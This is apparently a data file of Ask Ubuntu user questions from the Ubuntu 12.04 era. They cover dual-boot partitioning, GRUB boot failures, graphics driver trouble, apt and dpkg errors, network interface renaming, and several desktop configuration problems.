142603	is it a good idea to create seperate root , home , swap prior to installing ubuntu or just installing ubuntu on a single partition is a good choice ?	i wish to go for dual boot installation with already installed windows 7 . now , should i choose `` install along side of windows 7 `` or go to advanced and make separate partitions for home , swap , root etc ? what are the advantages of doing it ? there are similar topics on askubuntu.com . but here i want a complete answer . edit : what is / and /root ? how i can allocate maximum space for software installation ? ( 70 % for software and 30 % for home )
142604	notification daemon configuration trouble	i am using ubuntu 12.04 , and i have somehow got a notification daemon with dumb looking graphics . ( i actually purged unity and installed gnome . i also tweaked certain settings from compiz-configuration-settings-manager . i am not sure which one so these might have caused this . ) this is how my notifications look like currently - i want it to be like this one - however , a strange behaviour i observe is that when i log into my guest seesion , i have the latter good-looking notification daemon . clearly , the problem must be with some settings/configurations of the notification daemon for my main user . please help me fix this .
142611	is it legal to sell computers with ubuntu installed	is it legal to assemble a computer , install ubuntu on it , and then sell the computer . i do n't mean charging for the copy of ubuntu but for the price of parts and labor . that being said , would it be legal to charge for a cd that has ubuntu on it ; not for the software itself but for the price of the cd used ?
142621	how to turn the red light ( infrared or optical sound output light ) off ?	there is a red light turned on ( it seems an infrared light or optical sound ) when i boot ubuntu , and it remains always on , but not when i boot macos in a macbook pro . how can i save energy with ubuntu as much as with macos and have it turned off ? also , bluetooth should always be turned off at boot time , unless you configure it to be on .
142622	what does `` use keystrokes to scroll on alternate screen '' mean ?	`` use keystrokes to scroll on alternate screen '' is an option in gnome-terminal profile preferences . it seems that the person who wrote the help does n't know either because he skipped that option in the gnome-terminal manual . what is going on ? that happens at least in ubuntu-natty , but i doubt they have fixed that . answer : hahaha.. it should be `` enable the use of mouse scroll on alternate screen ( an alternate screen is a screen superimposed when you read man pages for example ) '' and not âuse keystrokes to scroll on alternate screenâ . hahaha . the meaning is the opposite . what is going on with quality control in ubuntu ? they are ruining the prestige of linux . who will correct that ? ?
142627	flgrx ( amd catalyst ) driver issues in ubuntu 12.04	i just finished installing ubuntu 12.04 32-bit on my laptop and i 'm having a hard time getting my graphic card drivers to work . jockey ( the gui for installing additional proprietary graphic drivers ) always fails to successfully install either of the two driver options it proposes me with , which are : ati/amd proprietary fglrx graphics drivers ( post-release updates ) ati/amd proprietary fglrx graphics drivers for both , it throws the following error message : sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log the log file was a dead end , since i lack the brains to understand it . i can post it if needed . i continued my investigation by checking if i could install the drivers using aptitude and here is where it gets weird . the command 'apt-cache policy fglrx-updates ' reveals that my system has the fglrx driver installed . also , when i do a search in the dash , i can access the catalyst control center and play with the driver settings so , as far as i can tell , the driver was , in fact , installed ... ? but when i use the additional drivers jockey app , it tells me that the drivers are n't installed and 'fails ' to install them . furthermore , when i look at my system details , under graphics , it tells me my machine is using 'vesa : rs880m ' which , as far as i can tell , are not the proprietary amd drivers . so it looks like the drivers are present on my machine but that ubuntu is n't using them . also , i have a copy of starcraft brood war that i like to run under wine on a different computer ( a desktop machine , also ubuntu 12.04 ) and it works fine there , but here on my laptop , the framerate is very slow and choppy . so i 'm wondering if these issues are related to ubuntu using the vesa drivers and not the proper amd drivers . to summarize : flgrx drivers for my ati graphics card seem to be installed , but jockey and system details tell me otherwise . jockey says they are not installed but then fails to install them , and system details says i am using vesa ( which i assume is different and not what i want ) . i want the propietary drivers because i suppose they will run faster . what is vesa ? is there a better alternative ? how is it that apt-cache tells me that the 'fglrx-updates ' package is installed , jockey tells me the contrary , and system details tell me it is using vesa for graphics ? starcraft ( original , 1998 game ) has a very choppy framerate but this laptop has a dual-core processor with 4gb of ram so i 'm assuming it has to do with my graphics drivers ( lack of 2d/3d acceleration ? ) does starcraft being slow have anything to do with the drivers not being properly installed ? i 'm lost . let me know if i 'm not making any sense . thanks .
142632	how to use the keyboard in gthumb image viewer ?	i can not use arrows nor shift-space , nor any key or key combination to go to previous image in gthumb 2.13.1 ( ubuntu natty narwhal 11.10 ) . there should be shortcut-keys even to flip horizontally and vertically . and i can not have a preview box ( like before ) . i think that there is no need to do image viewers that are worse and more clumsy to use than previews programs or previous versions of the same program . hello ! what is going on ?
142634	no system-choosing screen after installing ubuntu 12.04	i 'm new to linux , i decided to install ubuntu 12.04 next to win7 on my netbook . i 've createed boot pendrive and installed ubuntu using option `` install next to windows 7 '' , after installation , when i restarted my computer , there is no system-choosing screen ( i suppose it should be grub2 there ) and windows 7 starts normally . what 's the problem and how to fix it ?
142639	error with trying to compile with make . ( this also includes a snapshot after doing apt-get update )	this is the error i get : fetched 120 kb in 1min 1s ( 1,937 b/s ) reading package lists ... done w : gpg error : http : //update.yuuguu.com hardy release : the following signatures could n't be verified because the public key is not available : no_pubkey 483881fd2506e8cc w : gpg error : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey 5ec48884bb901940 w : gpg error : http : //extras.ubuntu.com precise release : the following signatures could n't be verified because the public key is not available : no_pubkey 16126d3a3e5c1192 w : failed to fetch http : // ... .archive.ubuntu.com/ubuntu/dists/precise/inrelease w : failed to fetch http : // ... .archive.ubuntu.com/ubuntu/dists/precise-security/inrelease w : failed to fetch http : // ... .archive.ubuntu.com/ubuntu/dists/precise-updates/inrelease w : failed to fetch http : // ... .archive.ubuntu.com/ubuntu/dists/precise-proposed/inrelease w : failed to fetch http : // ... .archive.ubuntu.com/ubuntu/dists/precise-backports/inrelease w : failed to fetch http : // ... .archive.ubuntu.com/ubuntu/dists/precise/release.gpg could not resolve ' ... .archive.ubuntu.com' w : failed to fetch http : // ... .archive.ubuntu.com/ubuntu/dists/precise-security/release.gpg could not resolve ' ... .archive.ubuntu.com' w : failed to fetch http : // ... .archive.ubuntu.com/ubuntu/dists/precise-updates/release.gpg could not resolve ' ... .archive.ubuntu.com' w : failed to fetch http : // ... .archive.ubuntu.com/ubuntu/dists/precise-proposed/release.gpg could not resolve ' ... .archive.ubuntu.com' w : failed to fetch http : // ... .archive.ubuntu.com/ubuntu/dists/precise-backports/release.gpg could not resolve ' ... .archive.ubuntu.com' w : some index files failed to download . they have been ignored , or old ones used instead . root @ ubuntu : /usr/src/asterisk/dahdi-linux-complete-2.6.0+2.6.0 # apt-get install make reading package lists ... done building dependency tree reading state information ... done package make is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'make ' has no installation candidate any ideas ?
142644	grub rescue error : unknown filesystem	i was trying to dual boot windows with linux ( linux installed first ) . i read that it was easier to do so if windows was installed first . so i tried to install windows , by creating a partition for it . there was n't enough room on the drive so i tried changing the filesystem of my existing partition to support windows . now whenever i try to start my computer i get the grub rescue screen . i 've tried booting from cd and usb with ubuntu and also with windows , but nothing happens . i ran ls in grub rescue and got hd0 , ( hd0 , msdos5 ) , cd ( with an install disc inserted ) , fd0 , and fd1 . however if i run ls on any of these i receive the error : unknown filesystem . can anyone help me out ?
142648	dell d620 ca n't detect external monitor when docked	installing 12.04 on dell d620 laptop ( nvidia quadro nvs 110m ) in a dell docking station with dell 1907fp external monitor . during install the external monitor is used fine but once installed , the 12.04 'monitor ' utility steadfastly refuses to detect anything external and i have to use the laptop screen for everything . lots of external monitor questions but i can not find the golden key to unlock this frustrating behaviour which is a step backwards from 11.04 ( using to make this post ) which happily detects the dell monitor . the external drivers utility reports i am using the latest version of nvidia graphics drivers and it is activated and in use .
142653	12.04 issues - missing drop down menu / missing evolution / no shut down and missing navigation bar	not a unix expert , running ubuntu on an older acer 5315 laptop as was better than vista . upgrade to 12.04 was interrupted , frozen at battery state . solved this with alt f5 and sudo get apt something or other and can get ubuntu login screen . starts ubuntu with only 4 folders on the left , no slide out menu , nothing but calendar top right . if i run sudo unity -- reset i get the slide out menu and a load of errors . need somehow to fix this so it works but more importantly get evolution back - wife has masses of emails and folders so cant risk an install that will lose this .
142655	ubuntu 12.04 : adobe flash player crashes , ca n't watch youtube	after doing a clean install of ubuntu 12.04 i realized the sound was missing as i played a yt video but could n't hear a thing . i managed to troubleshoot that problem , got the sound working , then installed cinnamon and a few applications from the ubuntu software center then went back to play a video on yt but it crashed and has been ever since . i tried installing , re-installing the adobe flash player , from the ubuntu software centre , from their website but so far the problem persists .
142662	how to solve jitter ( or stutter ) playback via chrome flash plugin ?	since the update to 12.04 , there 's been a problem specifically related to audio/video playback in google chrome . the problem only affected the google version but not the chromium nor the firefox browsers .
142665	duplicate /media directory entries	i installed ubuntu 64-bit 12.04 over ubuntu 32-bit 32-bit on the same partitions . in my /media directory i have what appear to be duplicate entries . i had found a similar issue on an ubuntu discussion forum but wanted to make absolute certain that it would okay in my situation . the suggestion i found was to `` sudo rm -r /media/ '' for each one in question . i 'm a relative newbie to linux and do n't want to break anything . how can i safety remove these extraneous entries without breaking anything ? jdphenix @ jdphenix-a770e : ~ $ ls -l /media total 42 dr-x -- -- -- 2 jdphenix jdphenix 548 feb 2 15:42 d3c1.0.0 drwx -- -- -- 3 jdphenix root 4096 may 18 01:39 linux-data drwxr-xr-x 3 jdphenix root 4096 may 17 18:43 linux-data_ drwx -- -- -- 2 jdphenix root 4096 may 17 19:24 udf volume drwx -- -- -- 2 jdphenix root 4096 may 17 19:24 usb drwx -- -- -- 1 jdphenix jdphenix 4096 may 25 03:11 usb_ drwx -- -- -- 2 jdphenix root 4096 may 17 19:24 win7-data drwx -- -- -- 1 jdphenix jdphenix 8192 may 25 03:12 win7-data_ drwx -- -- -- 1 jdphenix jdphenix 8192 may 25 03:11 win7-os the entries for linux-data , win7-data , usb and `` udf volume '' are the ones i 'm interested in . jdphenix @ jdphenix-a770e : ~ $ ls -l /media/win7-data total 0 jdphenix @ jdphenix-a770e : ~ $ ls -l /media/win7-data_ total 840 drwx -- -- -- 1 jdphenix jdphenix 4096 may 17 22:57 boot -rw -- -- -- - 1 jdphenix jdphenix 383562 jul 13 2009 bootmgr drwx -- -- -- 1 jdphenix jdphenix 0 may 17 20:41 boot-sav -rw -- -- -- - 1 jdphenix jdphenix 8192 may 17 22:57 bootsect.bak drwx -- -- -- 1 jdphenix jdphenix 12288 may 21 21:53 display.driver drwx -- -- -- 1 jdphenix jdphenix 0 may 21 21:53 display.optimus drwx -- -- -- 1 jdphenix jdphenix 4096 may 21 21:53 display.update drwx -- -- -- 1 jdphenix jdphenix 4096 may 18 01:16 documents drwx -- -- -- 1 jdphenix jdphenix 4096 may 22 23:22 downloads ... jdphenix @ jdphenix-a770e : ~ $ ls -l /media/linux-data total 4 drwxr-xr-x 4 jdphenix jdphenix 4096 may 18 18:56 world of warcraft jdphenix @ jdphenix-a770e : ~ $ ls -l /media/linux-data_ total 16 drwx -- -- -- 2 root root 16384 may 17 18:43 lost+found jdphenix @ jdphenix-a770e : ~ $ ls -l /media/usb total 0 jdphenix @ jdphenix-a770e : ~ $ ls -l /media/usb_ total 0 drwx -- -- -- 1 jdphenix jdphenix 0 may 18 19:23 $ recycle.bin drwx -- -- -- 1 jdphenix jdphenix 0 may 19 04:11 system volume information jdphenix @ jdphenix-a770e : ~ $ ls -l /media/ '' udf volume '' total 0
142667	why is my top menu missing and how can i fix it ?	today i rebooted my system and for some reason the menu at the top is blank ... no global menu , no time , no date , no nothing ... do you have any idea how this can be rectified ?
142668	how to add a temperature indicator to the panel ?	i have installed the sensors-applet using the terminal line : sudo apt-get install sensors-applet . but there is no applet in the list of applets when i right-click on the gnome-panel . i am using ubuntu natty on a macbook pro .
142670	skype : no mic under kde	it seems that i can use my mic under gnome , but not under kde . there must be a setting somewhere under kde that will allow me to use the mic that is built into my web cam , but i ca n't find it anywhere . how can i make use of my microphone under kde ?
142672	just installed ubuntu 12.04 . when booting , all i get is a black screen with cursor	installation appears to go fine . after rebooting , i get my motherboard loading screens , but when it comes time for ubuntu to boot , i just get a black screen with a blinking white underscore in the top-left - same as i got when waiting for the install cd to load , except it lasts forever . the only keypress it seems to recognize is ctrl+alt+del , which reboots . letters do n't register , function keys w/ or w/o modifiers do nothing . i 've installed ubuntu 12.04 twice and got the same error . the first time , i installed it as the only os , and had it take up the whole disk . the second time , i installed windows 7 first , then ubuntu by specifying custom partitions . after this install , it would boot straight to windows without showing grub . i used easybcd to add the ubuntu installation to grub , and this got grub to show , and let me select it , but it led back to the same error described up top . i 've had linux mint 11 and 12 installed on this pc , but was unable to get previous versions of ubuntu to install ( always had errors while installing , not after ) . hardware : intel core i7-2600k sandy bridge 3.4ghz ( 3.8ghz turbo boost ) lga 1155 asus sabertooth p67 ( rev 3.0 ) lga 1155 intel p67 sata 6gb/s usb 3.0 atx intel motherboard evga 01g-p3-1371-tr geforce gtx 460 ( fermi ) corsair vengeance 16gb ( 4 x 4gb ) 240-pin ddr3 sdram ddr3 1600 ( pc3 12800 ) western digital re4 wd5003abyx 500gb 7200 rpm sata 3.0gb/s 3.5 '' internal hard drive
142674	brasero 12.04 precis , cdrecord instead of wodim . cdrtools instead of cdrkit . plugin only wants wodim	i 've used cdrtools instead of cdrkit in the past , and has no significant problems getting brasero to accept cdrtools . however now it seems brasero will only look for wodim , it even would not accept a symlink pointing cdrecord - > wodim ! ! ! the same obviously goes for mkisofs - > genisoimage , and readcd - > readom . how can i get brasero to accept cdrtools ? i 'm ok with rebuilding the package if nessesary , but not sure where it is specified . if a ppa already exists for cdrtrools enables brasero , please let me know . i do not need to be told about brandon snider 's ppa , i 'm already aware how to get cdrtools installed . if anyone has any knowledge on this , any help in the right direction would be most appreciated .
142677	modinfo , /etc/modules and lsmod : incoherent output ?	i have `` rtc '' in /etc/modules but $ modinfo rtc outputs : error : modinfo : could not find module rtc and lsmod does n't show rtc
142679	installing 12.04 ubuntu studio on vmware workstation 7 , wo n't install vmware tools	i 'm attempting to install ubuntu studio 12.04 on my laptop by using vmware workstation 7.1.5 , and i 've encountered a problem . the install goes well until the installation of ubuntu has completed and the installation of vmware tools starts ; after that it just stops . i have waited about an hour and a half and nothing has changed . the installation is on vmware easy install , and i am running windows vista 32-bit with 3 gb system ram and 2 gb of ram on the virtual machine . any help is greatly appreciated , thank you !
142688	cpu frequency scaling for 12.04 ?	in 10.10 , i remember i had cpu frequency scaling monitor by default . now in 12.04 , i can not find anything similar in ubuntu software center . i wonder what applications are recommended for scaling cpu frequency in 12.04 , and how to get and install them ? thanks and regards !
142693	how do you install ubuntu straight onto your computer	is there a way to not have to put ubuntu on to a disc or usb ?
142695	what are the pros and cons of having a separate home partition ?	this is not a question about how to create a home partition , just as a caveat . : ) what are the pros and cons to having a separate home partition ? how do i know if having one is right for me ? will it increase or decrease speed of file retrieval ? are there any risks ?
142698	streaming radio	i can stream radio paradise in audacious but not in banshee . also in banshee , when i try to access amazon , i get this message : unable to load page problem occurred while loading the url https : //one.ubuntu.com/music/store/amz/geo/home/ can not resolve proxy hostname ( ) i am running ubuntu 12.04 lts
142699	after installing ubuntu my computer boots into grub rescue mode after displaying 'no such partition ' error message .	i wanted ubuntu on my gateway solo laptop . it had win98 on the c : \ and winxp on the d : \ . before the install , i could not boot from cd , but i could boot from floppy . i installed ubuntu to run alongside windows xp as that was one of the options . it did n't detect win98 , but i swear it 's on there . install seemed fine and then it asked me to reboot . when i rebooted , i got the message error : no such partition and the grub rescue > command prompt . i 've looked around , but some commands , like sudo , do n't work . one command i did get to work was set root= ( hd0,0 ) if that helps . i 'm a noob , and it was a pain installing win98 and xp since this system is so old . i do n't want to wipe my drive and start all over ! additional details copied from comments addendum , i restored my master boot record via my win98 boot floppy and typing in frisk /mbr . but , i 'd still like to get ubuntu - any help ? if i restored my master boot record - did i delete ubuntu ?
142706	12.04 lts boot failure	i recently updated from ubuntu 11.10 to 12.04 lts . everything was going good with 11.10 , but after the upgrade my system hangs up on boot . when i power down and re-boot , i get the options list for boot choices . i select the equivalent of boot with repair . the script goes on screen as it attempts to boot . when i see : [ 48.616020 ] : [ hardware error ] : cpu:0ymc4 - status ( - |ue|-|8cc| that 's all she wrote . i have an amd turion64 processor that was working fine with the previous os . i 'm guessing that 12.04 lts does n't like it ? anyway , is there a fix or can i do a rollback ? or am i re-installing . lost & confused
142714	misleading lack of freespace on apt-get install	i 'm trying to upgrade some packages , seems they already got downloaded sucessfuly , but everytime i try to install them i get a translated version of `` not enough space available on device '' . the error of the following message points to /usr mcloud @ sanctuary : ~ $ sudo apt-get -f install lendo listas de pacotes ... pronto construindo árvore de dependências lendo informação de estado ... pronto corrigindo dependências ... pronto os seguintes pacotes foram instalados automaticamente e já não são necessários : python-levenshtein python-enchant python-vobject python-utidylib python-iniparse python-dateutil use 'apt-get autoremove ' para removê-los . os pacotes extra a seguir serão instalados : linux-headers-3.2.0-25 parley-data os novos pacotes a seguir serão instalados : linux-headers-3.2.0-25 os pacotes a seguir serão atualizados : parley-data 1 pacotes atualizados , 1 pacotes novos instalados , 0 a serem removidos e 4 não atualizados . 389 pacotes não totalmente instalados ou removidos . é preciso baixar 0 b/15.7 mb de arquivos . depois desta operação , 56.2 mb adicionais de espaço em disco serão usados . você quer continuar [ s/n ] ? y ( lendo banco de dados ... 306928 ficheiros e directórios actualmente instalados . ) desempacotando linux-headers-3.2.0-25 ( de ... /linux-headers-3.2.0-25_3.2.0-25.40_all.deb ) ... dpkg : erro processando /var/cache/apt/archives/linux-headers-3.2.0-25_3.2.0-25.40_all.deb ( -- unpack ) : não conseguiu criar `/usr/src/linux-headers-3.2.0-25/arch/arm/include/asm/floppy.h.dpkg-new ' ( enquanto processava `./usr/src/linux-headers-3.2.0-25/arch/arm/include/asm/floppy.h ' ) : não há espaço disponível no dispositivo nenhum relatório apport escrito pois a mensagem de erro indica erro de disco cheio dpkg-deb : erro : subprocesso colar foi finalizado pelo sinal ( pipe quebrado ) preparando para substituir parley-data 4:4.8.2-0ubuntu1 ( usando ... /parley- data_4 % 3a4.8.3-0ubuntu0.1_all.deb ) ... desempacotando substituto parley-data ... processando gatilhos para hicolor-icon-theme ... erros foram encontrados durante o processamento de : /var/cache/apt/archives/linux-headers-3.2.0-25_3.2.0-25.40_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the system is mounted as this ( notice 242gb availabe on / which is where /usr is ) : mcloud @ sanctuary : ~ $ df sist . arq . 1k-blocos usad dispon . uso % montado em /dev/mapper/sanctuary-root 481848016 214758976 242995868 47 % / udev 1013184 4 1013180 1 % /dev tmpfs 410308 900 409408 1 % /run none 5120 0 5120 0 % /run/lock none 1025768 1460 1024308 1 % /run/shm /dev/sda5 233331 184948 35936 84 % /boot /etc/fstab contents : proc /proc proc defaults 0 0 /dev/mapper/sanctuary-root / ext4 noatime , errors=remount-ro 0 1 # /boot was on /dev/sda5 during installation uuid=c09adf3c-9e67-4dc3-8940-33cc8bd98f4e /boot ext2 defaults 0 2 /dev/mapper/sanctuary-swap_1 none swap sw 0 0 /dev/scd0 /media/cdrom0 udf , iso9660 user , noauto , exec , utf8 0 0 label=root / ext3 defaults , noatime , errors=remount-ro 0 1 this started happening after upgrading the system to 12.04
142719	gnome terminal requires root to open ?	in dash home of 12.04 , i searched for `` terminal '' , and it came up with `` root terminal '' . to open it , i have to provide the password for root . it is actually gnome terminal . i wonder if the gnome terminal can be accessed without requiring root ? thanks !
142720	ca n't run a program installed through gem install	i have installed ruby using rvm . i did a gem install rspec command and it seemed to install rspec correctly . if i do a rspec i get a `` the program 'rspec ' is not currently installed '' and i am suggested to apt-get it . if i try to do a gem install rspec again , it shows that rspec was already installed . i tried to do sudo gem install rspec thinking it might be permission problem but then the terminal said that the gem program was n't installed . how can i run the programs i have `` gem installed '' in ubuntu without resorting to doing an `` apt-get '' ?
142721	cuda instructions ask to stop gdm but it does n't exist	i am trying to install and run some cuda exemples in ubuntu 12.04 . first of all , i downloaded all .run files from http : //developer.nvidia.com/cuda-downloads , then followed the instructions at http : //developer.nvidia.com/nvidia-gpu-computing- , until i got hung up on the first step : exit the gui if you are in a gui environment by pressing ctrl-alt-backspace . some distributions require you to press this sequence twice in a row ; others have disabled it altogether in favor of a command such as sudo /etc/init.d/gdm stop . still others require changing the system runlevel using a command such as /sbin/init 3 to exit the gui . when i type the command sudo /etc/init.d/gdmstop , it returns : gdm command not found can anybody help me exit my gui in order to continue ? thank you in advance .
142725	12.04 upgrade to original wubi 11.10 dual boot with win7 now incomunicato	wubi 11.10 dual boot install on my win7 c60 amd64 acer aspire one 722 was working well enough , but after using the upgrade button to 12.04 the network connection fails any connect at all , saying to the effect that the hardware is not recognized . on subject machine i may have neglected to complete the 11.10 updates before running the upgrade to 12.04 . the questions please are how can i back out of this upgrade to wubi , since with no network connection one may not do over the wire repairs ? or lacking that back out , might one repair this from an iso file of 12.04 ? or lacking all , how may one back out of the wubi altogether and go back to the win7 only boot , since the 12.04 iso file is running well as a boot under vm virtual box under the win7 ?
142727	help with burg on 12.04	can anyone tell me if this article for burg boot-loader is correct ? i 'm sure it is due to the fact that i have never had a problem with the site before . but i am always weary of things made for older versions of ubuntu . keep in mind i have 12.04 not 11.04 . could the same be applied for 12.04 or are they completely different . if so , could you give me a step by step guide of what to do in order to get burg up and running on my 12.04 computer ? it also says to be completely sure of what i 'm doing and how to reverse it . i know that i 'm messing with my boot-loader , meaning , if i mess up , i would have basically no way of booting any operating system and would have to install ubuntu all over again in order to get back to the original boot-loader . ( or , at least , that is what happened before ( not when trying to change loaders , just when i accidentally turned off my computer while ubuntu was in start-up . ) but , i do not know any way to reverse the process if something were to go wrong . i dual-boot with windows 7 and ubuntu 12.04 only , side-by-side . my ubuntu partition is named /dev/sda4 , and ( according to gparted , ) contains /dev/sda6 ( file system : ext4 ) and /dev/sda4 ( file system : linux-swap ) . my windows 7 partition is /dev/sda3 . this information was given so you do n't have to say `` replace `` blah '' with your hard drive name , '' or anything like that . i do not want to mess anything up . even if it is all correct for ubuntu 12.04 , i 'd like you to rewrite it so any simpleton anywhere knows exactly what to do . ( no definitions needed . ) please and thank you .
142728	how to fix syslinux error creating a bootable usb stick in windows ?	i downloaded ubuntu 12.04 desktop and i am trying to create a bootable usb drive using the universal usb installer . however , i keep getting the message : an error ( 1 ) occurred while executing syslinux . your usb drive wonât be bootable . i have formatted the usb using fat32 ( both quick and complete format ) and even tried only fat . the error still appears . i have also turned off all firewall but it does not make a difference . why is this happening ?
142731	problem renaming wireless interfaces	i want to rename a wireless interface . right now i have 4 network interfaces , 2 wireless , 2 cable . the order is like this : eth0 - cable ( realtek rtl-8169 ) eth1 - cable ( intel 82579v ) eth2 - wireless ( broadcom bcm4321 proprietary drivers ) wlan0 - wireless ( ralink rt2800 ) i want to rename eth2 to wlan1 . this way the wireless cards are wlan and the cable ones are eth ( the way i like it ) . how can i do this ? using the suggestion made by virpara i found the following : eth1 - e1000e wlan0 - rt2800 wlan1 - b43 eth2 - wl # pci device 0x8086 : /sys/devices/pci0000:00/0000:00:19.0 ( e1000e ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 38:60:77 : ab:5e:30 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth1 '' # pci device 0x1814 : /sys/devices/pci0000:00/0000:00:1c.0/0000:02:00.0/0000:03:02.0 ( rt2800pci ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:25:9c:05 : fd:28 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # pci device 0x14e4 : /sys/devices/pci0000:00/0000:00:1c.0/0000:02:00.0/0000:03:00.0/ssb0:0 ( b43-pci-bridge ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:18:39:0e : f0 : ff '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan1 '' # pci device 0x14e4 : /sys/devices/pci0000:00/0000:00:1c.0/0000:02:00.0/0000:03:00.0 ( wl ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:18:39:0e : f0 : ff '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth2 '' now my questions are : why wlan1 and eth2 have the same mac ? if there are 2 duplicated macs ( eth2 & wlan1 ) where is the other nic ? why is realtek ( eth0 ) not appearing on the list ? where did wlan1 come from since i can not see it using ifconfig -a , iwconfig or lshw . there is no wlan1 except in the /etc/udev/rules.d/70-persistent-net.rules file .
142740	how to change the default system of dual-boot using wubi ?	i have both windows xp and ubuntu installed . i want to set ubuntu as my default system when boot the machine . i do n't want to press down+enter every time . i am using wubi . original boot.ini : [ boot loader ] timeout=30 default=multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows [ operating systems ] multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows= '' microsoft windows xp professional '' /noexecute=optin /fastdetect c : \wubildr.mbr = `` ubuntu '' modified boot.ini : [ boot loader ] timeout=30 default=c : \wubildr.mbr [ operating systems ] c : \wubildr.mbr = `` ubuntu '' multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows= '' microsoft windows xp professional '' /noexecute=optin /fastdetect but nothing changed .
142748	post grub black screen with cursor ubuntu 12.04	i can boot to grub but when i select ubuntu the screen goes black and there is only a white cursor that i can move around with my mouse . sometimes i can press some buttons and it gives me a desktop wallpaper with the cursor , but soon after it goes back to the black screen and then freezes . eventually it reboots . i am dual booting ubuntu 12.04 and windows 7 and use the windows boot manager to get into grub . i am a bit new with linux and i am unsure how to fix this problem .
142750	after installing ubuntu from usb , grub2 ca n't be installed !	hello ladies and gentlemen ! i installed ubuntu alongside with windows 7 using live usb . it would n't let me install grub , it says there 's a fatal error with the partition chose . i literally chose every single partition yet it did n't work ! so i chose not to install a bootloader for the sake of it 's not working . can any one help me on how to install a bootloader , i 'm talking from live usb .
142752	which nvidia-related bug is affecting me since proposed solutions did not work ?	when i log in to ubuntu , i select unity from the list of sessions ( not unity 2d ) . it logs in but is using unity 2d instead of 3d . i read several bug reports for nvidia graphics cards but am unsure which apply to me . i tried solutions from each but did not find one that fixes the problem . now , i am unsure if my bug is different , is being worked on , is fixed but i am not patching it correctly , or is planned to not be fixed . how do i determine this and find the right bug report to follow ? also , i see that my video card is blacklisted ( see below ) , but it is shown as being supported for unity 3d . is this because of a known bug and will it not be blacklisted in the future ? here is my video card : $ lspci | grep -i nvidia 01:00.0 vga compatible controller : nvidia corporation g72m [ geforce go 7400 ] ( rev a1 ) the problem began when i upgraded from ubuntu 10.04 to 12.04 . here is some more debugging information . $ /usr/lib/nux/unity_support_test -p opengl vendor string : nvidia corporation opengl renderer string : geforce go 7400/pcie/sse2 opengl version string : 2.1.2 nvidia 295.40 not software rendered : yes not blacklisted : no glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no
142754	how to install ubuntu 12.04 on a 64 bit pc	my question is how can you get a successful installation of ubuntu 12.04 os . i am about to download and load ubuntu 12.04 64 bit to my usb with the pen drive linux software . i have a dell 570 desktop 64 bit . i have bought a separate and physical hard drive for my new operating operating system , ... the hard drive is a sata 500 , western caviar blue . if anyone have any tips , i would really appreciate the help . i have been doing this one task for four days , but was not possible of getting it done . i have came up with grub missing files , it would n't read the old/new external hard drive . even thought it noticed and was installed to it . using the `` / `` , `` swap `` . if anyone can give me some feed back of help . so that it can be a good installation from top to bottom . and just to clarify i did make my own live cd with the ubuntu . plus does anyone know what is up with grub 1 and grub 2 . from ronnie d. marlow .
142755	how can i make the indicator backgrounds transparent in the gnome-panel ?	i 've searched everywhere to solve this problem and can not for the life of me find an answer . i am currently using ubuntu 12.04 with the gnome classic session . i am trying to make the background of my panel transparent and every tricky i try fails with the indicator backgrounds . is there a way to do this ? thanks !
142762	how to resize a window when the bottom right is not visible ?	i am trying to change the default pdf viewer on my kile latex frontend . when i reach settings ▸ configure - kile ▸ tools ▸ build ▸ viewpdf i am able to make the appropriate change . unfortunately , in the pop-up window for configure - kile , i am not able to see the bottom right corner . a right angle with an arrow does appear near the top left corner . but i am not able to resize the window using it . consequently i am not able to save the changes , rendering the entire operation pointless . the only option available on the top bar of the pop-up window is to close it . there 's no minimize or restore option available . edit : i am using ubuntu 11.10 , with virtual box ( full screen mode ) along with gnome ( version 3.2.1 ) . i dislike unity . but i guess my current predicament is because i have gotten rid of unity . edit ( images explaining the issue ) : screenshot when i open configure - kile : screenshot when i reach the viewpdf option :
142764	add teamspeak3 to unity launcher ?	how do i manually add something to the unity launcher ? i downloaded the teamspeak 3 client , and though i can run it from the executable i 'd really like to have a launcher icon on the unity launcher . while ts3 is running there is an icon there and it even has the ts3 logo on the icon . it looks great when running . if i right-click that icon and `` lock to launcher '' the icon will stay but does not launch teamspeak when clicked . any help is greatly appreciated .
142766	changing wallpaper on 12.04 login screen	i 'm using this link but seems to be not working on 12.04 , here 's the terminal message below : are there other softwares/tips for changing the login screen ? i 'm also using link but seems outdated . failed to fetch http : //ppa.launchpad.net/claudiocn/slm/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/claudiocn/slm/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/claudiocn/slm/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . law @ ubuntu : ~ $ sudo apt-get install simple-lightdm-manager reading package lists ... done building dependency tree reading state information ... done e : unable to locate package simple-lightdm-manager
